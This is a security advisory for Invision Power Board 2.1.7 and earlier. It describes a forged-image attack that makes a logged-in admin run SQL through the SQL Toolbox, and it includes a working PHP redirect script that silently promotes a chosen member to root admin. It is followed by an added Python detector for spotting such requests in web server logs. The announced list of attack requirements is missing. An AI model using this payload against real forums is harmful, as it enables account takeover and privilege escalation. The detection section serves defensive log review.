Invision Power Board Multiple Vulnerabilities
Affects: IPB <=2.1.7
Risk: High
An attack exists where an admin can be redirected and
forced to execute SQL commands through IPB's SQL
Toolbox.
The following requirements must be met for this attack
to take place:
This attack works invisibly to the admin because only
the image is redirected, not the page.
1st method:
In this method, any user can force the admin to
execute SQL commands.
2nd method:
A restricted admin can add any HTML to a forum's
description (including JavaScript).
Example malicious image script:
<?php
//The member id to promote to root admin
$mid = 145;
//The database prefix (usually "ibf_")
$prefix = "ibf_";
if (preg_match('/(.*adsess=[\\w]{32})/', $_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
header("Location: ".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+where+id%3D{$mid}+LIMIT+1");
}
?>
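For defenders reviewing web server logs, the redirect above leaves a recognisable trace: a GET request whose URL carries act=sql, code=runsql and the SQL text in the query parameter. The following is an added detection example, not part of the original advisory or of IPB; the combined log format, the admin.php path, the forum.example host and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access log format (assumed for this example)
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

def find_forced_runsql(lines):
    """Return one finding per GET request that runs SQL via the toolbox URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "GET":
            continue  # a followed redirect always arrives as a GET
        params = parse_qs(urlsplit(m["target"]).query)
        if params.get("act") != ["sql"] or params.get("code") != ["runsql"]:
            continue
        if "query" not in params:
            continue
        ref_params = parse_qs(urlsplit(m["referer"]).query)
        findings.append({
            "ip": m["ip"],
            "time": m["ts"],
            "sql": params["query"][0],  # URL-decoded SQL statement
            "referer": m["referer"],
            # True when the referring page was not the SQL Toolbox itself
            # (heuristic, assumption of this example)
            "referer_outside_toolbox": ref_params.get("act") != ["sql"],
        })
    return findings

# Constructed sample log lines (session id, hosts and addresses are made up)
SESS = "0123456789abcdef0123456789abcdef"
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2006:10:01:02 +0000] '
    '"GET /index.php?showtopic=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/May/2006:10:03:44 +0000] '
    f'"GET /admin.php?adsess={SESS}&act=sql&code=runsql&query=UPDATE+ibf_members'
    '+SET+mgroup%3D4+where+id%3D145+LIMIT+1 HTTP/1.1" 200 812 '
    f'"http://forum.example/admin.php?adsess={SESS}&act=forum" "Mozilla/5.0"',
    '198.51.100.9 - - [12/May/2006:10:09:10 +0000] '
    f'"POST /admin.php?adsess={SESS} HTTP/1.1" 200 900 '
    f'"http://forum.example/admin.php?adsess={SESS}&act=sql" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_forced_runsql(SAMPLE_LOG):
        print(finding)
```

A finding whose SQL changes mgroup in the members table, as in the advisory's example, is worth checking against the list of admins who were logged in at that time.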